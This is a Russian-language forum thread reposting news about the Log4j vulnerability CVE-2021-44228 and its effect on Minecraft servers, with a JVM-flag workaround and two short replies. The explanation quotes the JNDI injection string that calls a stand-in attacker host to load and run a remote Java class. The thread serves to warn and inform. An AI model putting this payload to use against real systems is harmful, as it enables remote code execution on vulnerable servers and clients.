Загрузка...

Слив Катастрофическая уязвимость в Apache Log4j, затрагивающая многие Java-проекты

Тема в разделе Minecraft создана пользователем RocketDude 10 дек 2021. (поднята 12 дек 2021) 1048 просмотров

  1. RocketDude
    RocketDude Автор темы 10 дек 2021 ДОМЕНЫ https://zelenka.guru/threads/2865040/ 4362 21 ноя 2018
    В Apache Log4j, популярном фреймворке для организации ведения ***** в Java-приложениях, выявлена критическая уязвимость, позволяющая выполнить произвольный код при записи в лог специально оформленного значения в формате "{jndi:URL}". Атака может быть проведена на Java-приложения, записывающие в лог значения, полученные из внешних источников, например, при выводе проблемных значений в сообщениях об ошибках. Отмечается, что проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft. Ожидается, что уявзимость может привести к волне массовых атак на корпоративные приложения, повторив историю критических уязвимостей во фреймворке Apache Struts, который по приблизительной оценке применяется в web-приложениях 65% компаний из списка Fortune 100. В том числе уже зафиксированы попытки сканирования сети на предмет уязвимых систем. Проблема усугубляется тем, что уже опубликован рабочий эксплоит, но исправления для стабильных веток на данный момент не сфромированы. СVE-идентификатор пока не присвоен. Исправление включено только в тестовую ветку log4j-2.15.0-rc1. В качестве обходного пути блокирования уязвимости рекомендуется выставить параметр log4j2.formatMsgNoLookups в значение true. Проблема была вызвана тем, что log4j поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения. Дополнение 1: Уязвимости присвоен идентификатор CVE-2021-44228. Дополнение 2: Выявлен способ обхода защиты, добавленной выпуск log4j-2.15.0-rc1. Предложено новое обновление log4j-2.15.0-rc2 с более полной защитой от уязвимости. В коде выделяется изменение, связанное с отсутствием аварийного завершения в случае использования некорректно оформленного JNDI URL.

    [IMG] Minecraft под атакой: тысячи серверов перестали работать.

    Была обнаружена критическая уязвимость, которая затрагивает все версии, начиная с 1.7: игроки могут запускать код на чужих устройствах с помощью внутриигровых сообщений, останавливая работу серверов. Эта же уязвимость позволяет узнать IP-адреса участников сервера и именно поэтому сейчас не рекомендуется заходить во вкладку «Сетевая игра».

    Чтобы пофиксить уязвимость добавьте следующий JVM аргумент в командую строку до того, как версия 1.18.1 станет доступна:
    -Dlog4j2.formatMsgNoLookups=true


    Да и похуй что копипаст, главное людей уведомить
     
  2. kosmos_s
    kosmos_s 10 дек 2021 0 12 июн 2017
    А че делать если этот код уже выполнили на тебе :clown:
    Играл в майн на 1.12.2 и какой-то чел зашёл, использовал уязвимость и всех на сервере кикнуло
     
    1. Nuclear_Cat
      kosmos_s, скинь **** в тот момень. там его айпи написан
Top
Загрузка...